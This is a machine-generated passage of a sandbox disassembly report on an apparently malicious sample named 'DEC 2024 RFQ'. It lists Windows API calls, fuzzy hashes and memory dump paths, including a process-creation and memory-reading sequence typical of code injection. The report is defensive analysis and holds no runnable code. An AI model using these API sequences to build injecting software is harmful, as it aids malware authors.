• _free.LIBCMT ref: 000896A9
• _free.LIBCMT ref: 00089714
  • Part of subcall function 00042D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00049A24), ref: 00042D69
  • Part of subcall function 00042D55: GetLastError.KERNEL32(00000000,?,00049A24), ref: 00042D7B
• _free.LIBCMT ref: 0008971C
Memory Dump Source
• Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
Similarity
• API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
• String ID:
• API String ID: 1552873950-0
                                                                                                                      APIs
                                                                                                                      Similarity
                                                                                                                      • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2782032738-0
                                                                                                                      • Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                                                                                      • Instruction ID: 7734e805009f182c970bc29d4050717703bb05ae10a4e98c645e5c8c3610aeef
                                                                                                                      • Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                                                                                      • Instruction Fuzzy Hash: 4641E4F4B04746ABDB28CF69C880AAE77E5EF42360B24857DE815C7641EB70DD428B48
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 0005EA39
                                                                                                                      • GetOpenFileNameW.COMDLG32(?), ref: 0005EA83
                                                                                                                        • Part of subcall function 00024750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00024743,?,?,000237AE,?), ref: 00024770
                                                                                                                        • Part of subcall function 00040791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 000407B0
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: Name$Path$FileFullLongOpen_memset
                                                                                                                      • String ID: X
                                                                                                                      • API String ID: 3777226403-3081909835
                                                                                                                      • Opcode ID: a0511a65ef580bf49c9d01ef7f7992e0070b0eaafb4a473275872974f2b06b77
                                                                                                                      • Instruction ID: 091f9beaf5cc08e24417dbe2d5cf1eeea5103389da1de0bd85d4973f59810646
                                                                                                                      • Opcode Fuzzy Hash: a0511a65ef580bf49c9d01ef7f7992e0070b0eaafb4a473275872974f2b06b77
                                                                                                                      • Instruction Fuzzy Hash: 5921D870A042589BDF51DF94DC45BEE7BF8AF49715F00401AE908BB242DFB8598D8FA1
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: __fread_nolock_memmove
                                                                                                                      • String ID: EA06
                                                                                                                      • API String ID: 1988441806-3962188686
                                                                                                                      • Opcode ID: c79943bb2e651deec91029d0f6b70659be152be08620699a2ac2160fee44b51c
                                                                                                                      • Instruction ID: b03b9cb1caa2197fd85b0053771d2cc7bf82e9220484640c0491f1c8275e9bcf
                                                                                                                      • Opcode Fuzzy Hash: c79943bb2e651deec91029d0f6b70659be152be08620699a2ac2160fee44b51c
                                                                                                                      • Instruction Fuzzy Hash: C901F9B18042187FDB28DBA8CC16EFE7BF8DB11311F0041ABF592D2282E874A6048760
                                                                                                                      APIs
                                                                                                                      • GetTempPathW.KERNEL32(00000104,?), ref: 000898F8
                                                                                                                      • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0008990F
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: Temp$FileNamePath
                                                                                                                      • String ID: aut
                                                                                                                      • API String ID: 3285503233-3010740371
                                                                                                                      • Opcode ID: c94a505c3e2af739f1086bde87fd4b30824981c448f77f1f5a315138f6061457
                                                                                                                      • Instruction ID: b037695be6d31ac0aee4b242d0b02ca3b705e533469cc1a0d0f9284fb5761ba6
                                                                                                                      • Opcode Fuzzy Hash: c94a505c3e2af739f1086bde87fd4b30824981c448f77f1f5a315138f6061457
                                                                                                                      • Instruction Fuzzy Hash: 80D05E7954030EABEB509BE0DC0EFEA773CE704701F0042B1BB94951A1EEB495988BA1
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 3355b75dbdb50d9603c5682628a380dc2bacc19fac6b9774edb3b9203474b680
                                                                                                                      • Instruction ID: 4ee2eb7051ec0684812f06af8eaa03b5c874ecb9a72991675d1b37909192ebeb
                                                                                                                      • Opcode Fuzzy Hash: 3355b75dbdb50d9603c5682628a380dc2bacc19fac6b9774edb3b9203474b680
                                                                                                                      • Instruction Fuzzy Hash: 21F13871A083059FDB14DF28C490A6ABBE5FF89314F54892EF8999B352D730E945CF82
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00040162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00040193
                                                                                                                        • Part of subcall function 00040162: MapVirtualKeyW.USER32(00000010,00000000), ref: 0004019B
                                                                                                                        • Part of subcall function 00040162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 000401A6
                                                                                                                        • Part of subcall function 00040162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 000401B1
                                                                                                                        • Part of subcall function 00040162: MapVirtualKeyW.USER32(00000011,00000000), ref: 000401B9
                                                                                                                        • Part of subcall function 00040162: MapVirtualKeyW.USER32(00000012,00000000), ref: 000401C1
                                                                                                                        • Part of subcall function 000360F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0002F930), ref: 00036154
                                                                                                                      • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0002F9CD
                                                                                                                      • OleInitialize.OLE32(00000000), ref: 0002FA4A
                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 000645C8
                                                                                                                      Similarity
                                                                                                                      • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1986988660-0
                                                                                                                      • Opcode ID: 86e74cabe9e793d101041eee9bd58af81a069b94dc11975d2722da1ea2fe412f
                                                                                                                      • Instruction ID: 1e40cb35bc1c5b10f4c67597692475c9f7786aeb5ba5882dc640471dd1ddd6c3
                                                                                                                      • Opcode Fuzzy Hash: 86e74cabe9e793d101041eee9bd58af81a069b94dc11975d2722da1ea2fe412f
                                                                                                                      • Instruction Fuzzy Hash: E781C0F0905EC18EA384DF39FD856597AE5BB48B0F750892A9118EF2A2EB7C45808F11
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 00024370
                                                                                                                      • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00024415
                                                                                                                      • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00024432
                                                                                                                      Similarity
                                                                                                                      • API ID: IconNotifyShell_$_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1505330794-0
                                                                                                                      • Opcode ID: 8fd02b385163130d29ca01e3e7c276d331df266647e65762486ac5617fd95545
                                                                                                                      • Instruction ID: b338475c45864f43fdf93bc565c55d258d3ba3e6f880d49676729db25c7ae0f2
                                                                                                                      • Opcode Fuzzy Hash: 8fd02b385163130d29ca01e3e7c276d331df266647e65762486ac5617fd95545
                                                                                                                      • Instruction Fuzzy Hash: CC3191B09047118FD760EF24E88469BBBF8FB49709F000D2EF69A96251E774A948CB52
                                                                                                                      APIs
                                                                                                                      • __FF_MSGBANNER.LIBCMT ref: 00045733
                                                                                                                        • Part of subcall function 0004A16B: __NMSG_WRITE.LIBCMT ref: 0004A192
                                                                                                                        • Part of subcall function 0004A16B: __NMSG_WRITE.LIBCMT ref: 0004A19C
                                                                                                                      • __NMSG_WRITE.LIBCMT ref: 0004573A
                                                                                                                        • Part of subcall function 0004A1C8: GetModuleFileNameW.KERNEL32(00000000,000E33BA,00000104,?,00000001,00000000), ref: 0004A25A
                                                                                                                        • Part of subcall function 0004A1C8: ___crtMessageBoxW.LIBCMT ref: 0004A308
                                                                                                                        • Part of subcall function 0004309F: ___crtCorExitProcess.LIBCMT ref: 000430A5
                                                                                                                        • Part of subcall function 0004309F: ExitProcess.KERNEL32 ref: 000430AE
                                                                                                                        • Part of subcall function 00048B28: __getptd_noexit.LIBCMT ref: 00048B28
                                                                                                                      • RtlAllocateHeap.NTDLL(016E0000,00000000,00000001,00000000,?,?,?,00040DD3,?), ref: 0004575F
                                                                                                                      Similarity
                                                                                                                      • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1372826849-0
                                                                                                                      • Opcode ID: 0cbb64272baa2ee7b5a7e31fa9ba7f678b2ac30cd43e29f1ca55ea5dfb645856
                                                                                                                      • Instruction ID: 1932dd592f77310e31f2ef5ceb9ff23917cc642eb6135f88bcf91e8dcd38cadf
                                                                                                                      • Opcode Fuzzy Hash: 0cbb64272baa2ee7b5a7e31fa9ba7f678b2ac30cd43e29f1ca55ea5dfb645856
                                                                                                                      • Instruction Fuzzy Hash: 3C01D2F1248A01EFE6503B34BC86AAE77888F42763F100539F545AB193DF748D00476D
                                                                                                                      APIs
                                                                                                                      • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00089548,?,?,?,?,?,00000004), ref: 000898BB
                                                                                                                      • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00089548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 000898D1
                                                                                                                      • CloseHandle.KERNEL32(00000000,?,00089548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 000898D8
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: File$CloseCreateHandleTime
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3397143404-0
                                                                                                                      • Opcode ID: 1eb6199764db9ca3ee88c54aad16e40df1a57ec20438aa024c2ea35fd48f62f0
                                                                                                                      • Instruction ID: dfc3bc79943501399b7a05010e47f8538ae0580a2f7325ee801d8c740e91933c
                                                                                                                      • Opcode Fuzzy Hash: 1eb6199764db9ca3ee88c54aad16e40df1a57ec20438aa024c2ea35fd48f62f0
                                                                                                                      • Instruction Fuzzy Hash: AAE08632240615FBEB312B94EC09FEA7B59AB07760F144120FB54690E087B516119798
                                                                                                                      APIs
                                                                                                                      • _free.LIBCMT ref: 00088D1B
                                                                                                                        • Part of subcall function 00042D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00049A24), ref: 00042D69
                                                                                                                        • Part of subcall function 00042D55: GetLastError.KERNEL32(00000000,?,00049A24), ref: 00042D7B
                                                                                                                      • _free.LIBCMT ref: 00088D2C
                                                                                                                      • _free.LIBCMT ref: 00088D3E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 776569668-0
                                                                                                                      • Opcode ID: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                                                                                      • Instruction ID: b6549aa22afe93fca79f21e4f76ee5979c1a0e962362c2437857b993f0fcac7f
                                                                                                                      • Opcode Fuzzy Hash: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                                                                                      • Instruction Fuzzy Hash: 8AE012E1B0170156CB64B578A940AD313DC5F58392F94492DB44DD7187DE64F882832C
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: CALL
                                                                                                                      • API String ID: 0-4196123274
                                                                                                                      • Opcode ID: caef53be8c9aafc4f82e7d2b21a9dda79edb5af75cdabe42b53d2d22eb74da29
                                                                                                                      • Instruction ID: 83d8b7dd86784aa12bd67a5da04b08767ff384b0e85d37bea68b467202e87946
                                                                                                                      • Opcode Fuzzy Hash: caef53be8c9aafc4f82e7d2b21a9dda79edb5af75cdabe42b53d2d22eb74da29
                                                                                                                      • Instruction Fuzzy Hash: 26227970A08321DFDB24DF14D494B6AB7E1BF85300F14896DE88A9B362DB35EC45CB82
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memmove
                                                                                                                      • String ID: EA06
                                                                                                                      • API String ID: 4104443479-3962188686
                                                                                                                      • Opcode ID: 2adb4e5775ea2d26cd04414ccabcb44d94bbf8a0397bf82811ea57cdbb9cbc3d
                                                                                                                      • Instruction ID: 55d7be5808157e6bf4c2c61a47d34ee6a3d07e9d355f8f93920e225becd82c1d
                                                                                                                      • Opcode Fuzzy Hash: 2adb4e5775ea2d26cd04414ccabcb44d94bbf8a0397bf82811ea57cdbb9cbc3d
                                                                                                                      • Instruction Fuzzy Hash: 99415A31A041785BDF329B64FC917FE7FA69B46300F684475EC86EB287D6309D4487A1
                                                                                                                      APIs
                                                                                                                      • IsThemeActive.UXTHEME ref: 00024834
                                                                                                                        • Part of subcall function 0004336C: __lock.LIBCMT ref: 00043372
                                                                                                                        • Part of subcall function 0004336C: DecodePointer.KERNEL32(00000001,?,00024849,00077C74), ref: 0004337E
                                                                                                                        • Part of subcall function 0004336C: EncodePointer.KERNEL32(?,?,00024849,00077C74), ref: 00043389
                                                                                                                        • Part of subcall function 000248FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00024915
                                                                                                                        • Part of subcall function 000248FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0002492A
                                                                                                                        • Part of subcall function 00023B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00023B68
                                                                                                                        • Part of subcall function 00023B3A: IsDebuggerPresent.KERNEL32 ref: 00023B7A
                                                                                                                        • Part of subcall function 00023B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,000E52F8,000E52E0,?,?), ref: 00023BEB
                                                                                                                        • Part of subcall function 00023B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00023C6F
                                                                                                                      • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00024874
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1438897964-0
                                                                                                                      • Opcode ID: 4c2e557b09d7fa174db4b392d17f8d5abfa4a9bebeb2b4511c04594545916653
                                                                                                                      • Instruction ID: dfcb1d680cc2b70e974c7bb457e340ccf1b0bc8f9738f8c0869652a7b7103823
                                                                                                                      • Opcode Fuzzy Hash: 4c2e557b09d7fa174db4b392d17f8d5abfa4a9bebeb2b4511c04594545916653
                                                                                                                      • Instruction Fuzzy Hash: ED11C0718087519BD700DF68EC4585EBBE8EF99B50F10491FF1449B2B2DB748604CB91
                                                                                                                      APIs
                                                                                                                      • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,00025821,?,?,?,?), ref: 00025CC7
                                                                                                                      • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,00025821,?,?,?,?), ref: 0005DD73
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateFile
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 823142352-0
                                                                                                                      • Opcode ID: 019c29479e4145b55a6a7b049875b552d7b7c9e13984e644fe7c7719217e92b9
                                                                                                                      • Instruction ID: 610cb81b2f4c94097c4d846dbb80d137d1e076a490753778745694060d6983cb
                                                                                                                      • Opcode Fuzzy Hash: 019c29479e4145b55a6a7b049875b552d7b7c9e13984e644fe7c7719217e92b9
                                                                                                                      • Instruction Fuzzy Hash: 56019670244718BEF3700E24DC8AF7637ECAB0176AF208325BAD59A1E0D6B45C48CB54
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0004571C: __FF_MSGBANNER.LIBCMT ref: 00045733
                                                                                                                        • Part of subcall function 0004571C: __NMSG_WRITE.LIBCMT ref: 0004573A
                                                                                                                        • Part of subcall function 0004571C: RtlAllocateHeap.NTDLL(016E0000,00000000,00000001,00000000,?,?,?,00040DD3,?), ref: 0004575F
                                                                                                                      • std::exception::exception.LIBCMT ref: 00040DEC
                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 00040E01
                                                                                                                        • Part of subcall function 0004859B: RaiseException.KERNEL32(?,?,?,000D9E78,00000000,?,?,?,?,00040E06,?,000D9E78,?,00000001), ref: 000485F0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3902256705-0
                                                                                                                      • Opcode ID: 8d26ed3fac80cc1c4e5711fcc3d66168eaf90f68c1a4e3c044e0e95a085bc6a0
                                                                                                                      • Instruction ID: 8f979f33818fad5a2667476922ca76b2d96394bb2c9621d7db0255df3d165344
                                                                                                                      • Opcode Fuzzy Hash: 8d26ed3fac80cc1c4e5711fcc3d66168eaf90f68c1a4e3c044e0e95a085bc6a0
                                                                                                                      • Instruction Fuzzy Hash: 71F0C8F190431D66DB10BAA9EC019DF7BEC9F01311F10487AFE04A6292DF709A94C2D9
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __lock_file_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 26237723-0
APIs
  • Part of subcall function 00048B28: __getptd_noexit.LIBCMT ref: 00048B28
• __lock_file.LIBCMT ref: 000453EB
  • Part of subcall function 00046C11: __lock.LIBCMT ref: 00046C34
• __fclose_nolock.LIBCMT ref: 000453F6
Similarity
• API ID: __fclose_nolock__getptd_noexit__lock__lock_file
• String ID:
• API String ID: 2800547568-0
APIs
• MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,?,?,?,0002542F,?,?,?,?,?), ref: 0002807A
• MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,?,?,?,0002542F,?,?,?,?,?), ref: 000280AD
  • Part of subcall function 0002774D: _memmove.LIBCMT ref: 00027789
Similarity
• API ID: ByteCharMultiWide$_memmove
• String ID:
• API String ID: 3033907384-0
APIs
• CreateProcessW.KERNELBASE(?,00000000), ref: 0173ACBD
• Wow64GetThreadContext.KERNEL32(?,00010007), ref: 0173ACE1
• ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0173AD03
Memory Dump Source
• Source File: 00000000.00000002.1691628844.0000000001739000.00000040.00000020.00020000.00000000.sdmp, Offset: 01739000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1739000_DEC 2024 RFQ.jbxd
Similarity
• API ID: Process$ContextCreateMemoryReadThreadWow64
• String ID:
• API String ID: 2438371351-0
APIs
• SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00025B96
Similarity
• API ID: FilePointer
• String ID:
• API String ID: 973152223-0
APIs
Similarity
• API ID: ProtectVirtual
• String ID:
• API String ID: 544645111-0
APIs
Similarity
• API ID: ClearVariant
• String ID:
• API String ID: 1473721057-0
APIs
Similarity
• API ID: _memmove
• String ID:
• API String ID: 4104443479-0
APIs
  • Part of subcall function 00024BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00024BEF
  • Part of subcall function 0004525B: __wfsopen.LIBCMT ref: 00045266
• LoadLibraryExW.KERNEL32(?,00000000,00000002,?,000E52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00024E0F
  • Part of subcall function 00024B6A: FreeLibrary.KERNEL32(00000000), ref: 00024BA4
  • Part of subcall function 00024C70: _memmove.LIBCMT ref: 00024CBA
                                                                                                                      Similarity
                                                                                                                      • API ID: Library$Free$Load__wfsopen_memmove
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1396898556-0
                                                                                                                      APIs
                                                                                                                      Similarity
                                                                                                                      • API ID: ClearVariant
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1473721057-0
                                                                                                                      APIs
                                                                                                                      • ReadFile.KERNELBASE(?,?,00010000,?,00000000,00000000,?,00010000,?,000256A7,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00025C16
                                                                                                                      Similarity
                                                                                                                      • API ID: FileRead
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2738559852-0
                                                                                                                      APIs
                                                                                                                      Similarity
                                                                                                                      • API ID: _memmove
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4104443479-0
                                                                                                                      APIs
                                                                                                                      • __lock_file.LIBCMT ref: 000448A6
                                                                                                                        • Part of subcall function 00048B28: __getptd_noexit.LIBCMT ref: 00048B28
                                                                                                                      Similarity
                                                                                                                      • API ID: __getptd_noexit__lock_file
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2597487223-0
                                                                                                                      APIs
                                                                                                                      • FreeLibrary.KERNEL32(?,?,000E52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00024E7E
                                                                                                                      Similarity
                                                                                                                      • API ID: FreeLibrary
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3664257935-0
                                                                                                                      APIs
                                                                                                                      • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 000407B0
                                                                                                                        • Part of subcall function 00027BCC: _memmove.LIBCMT ref: 00027C06
                                                                                                                      Similarity
                                                                                                                      • API ID: LongNamePath_memmove
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2514874351-0
                                                                                                                      APIs
                                                                                                                      Similarity
                                                                                                                      • API ID: __fread_nolock
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2638373210-0
                                                                                                                      APIs
                                                                                                                      • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001,?,?,?,0005DD42,?,?,00000000), ref: 00025C5F
                                                                                                                      Similarity
                                                                                                                      • API ID: FilePointer
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 973152223-0
                                                                                                                      APIs
                                                                                                                      Similarity
                                                                                                                      • API ID: __wfsopen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 197181222-0
APIs
• GetLastError.KERNEL32(00000002,00000000), ref: 0008D1FF
Memory Dump Source
• Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
